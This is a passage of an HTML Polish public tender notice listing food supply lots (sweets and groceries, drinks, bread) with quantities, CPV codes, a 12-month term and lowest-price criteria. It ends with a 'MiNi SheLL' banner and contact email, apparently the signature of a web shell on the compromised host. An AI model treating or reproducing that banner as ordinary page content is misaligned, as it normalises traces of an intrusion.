równoważna 38g  +/- 5%, Czekolada mleczna  100g, Wafelek w czekoladzie  39g  +/- 5%, Wafelek b/czek.  39G  +/- 5%, Baton  lub równoważny  Kit-Kat  40g +/- 5%, Baton  Lion  lub równoważny 43g +/- 5%, Baton  Mars   lub równoważny 42g +/- 5%, Baton Pawełek  lub równoważny 45g +/-  5%, Baton Snickers  lub równoważny 51g +/- 5%, Baton Sękacz   lub równoważny +/- 5%, Cukierki owocowe  1000g +/- 5%, Cukierki w polewie czekoladowej 1000g +/- 5%, Draże 70g +/- 5%, Herbatniki  100g +/- 5%, Ciastka kruche 1000g +/- 5%, Paluszki 100g, Sezamki 27g +/- 5%, Drops 47g +/- 5%, Lizak 12g +/- 5%, Cukier waniliowy 32g +/-5%, Cynamon 15g +/- 5%, Krem czekoladowy typu Nutella lub równoważny 750g +/- 5%, Kwasek cytrynowy  20g +/- 5%, Galaretka  owocowa 90g +/-5%, Chałwa 50g +/- 5%, Maggi 1L +/- 10%, Chrzan 290g; +/ - 5%, Fasola Jaś 500g +/- 5%, Fasolka  konserwowa 400g +/- 5%, Groszek konserwowy 400g +/- 5%, Kukurydza 
konserwowa 400g +/- 5%, Groch łuskany 500g +/- 5%, Ogórek konserwowy 900ml  +/- 5%, Szczaw konserwowy 300g +/- 5%, Koncentrat pomidorowy 200ml +/- 5%, Brzoskwinia w syropie 900g +/- 5%, Dżem truskawka  280g +/- 5%, Dżem morelowy  280g +/- 5%, Rodzynki 200g +/- 5%, Mąka ziemniaczana 500g +/- 5%, Ananas puszka 580g +/- Papryka konserwowa 680g+/- 5%, Biszkopty 250g +/- 5%, Budyń 40g +/- 5%, Kisiel 40g +/- 5%, Syrop owocowe różne 335ml +/- 5%, Syrop 5 L 
 +/- 5%, Pyzy 1000g +/- 5%, Drożdże 100g +/- 5%, Pizza mrożona 300g +/- 5%, Ocet spirytusowy 10% 500ml +/- 5%;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> NAPOJE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Napój owocowy  0,5 l, Woda niegazowana 1,5 l typu Żywiec lub równoważna, Woda niegazowana 0,5 l typu Żywiec lub równoważna, Sok owocowy 2L np.100%, Sok marchwiowo - owocowy typu Kubuś lub równoważny 1L, Sok marchwiowo - owocowy, Typu Kubuś lub równoważny 200 ml;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PIECZYWO I PIECZYWO  CUKIERNICZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb zwykły krojony 1000g +/- 10%, Bułka pszenna  50g +/- 5%, Bułka zapiekanka 150g +/- 5%, Bułka tarta 500g  +/- 5%, Drożdżówka 80g +/- 5%, Pączek 80g +/- 5%, Rogal 80g +/- 5%, Bułka Hot-Dog  100g +/- 5%;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com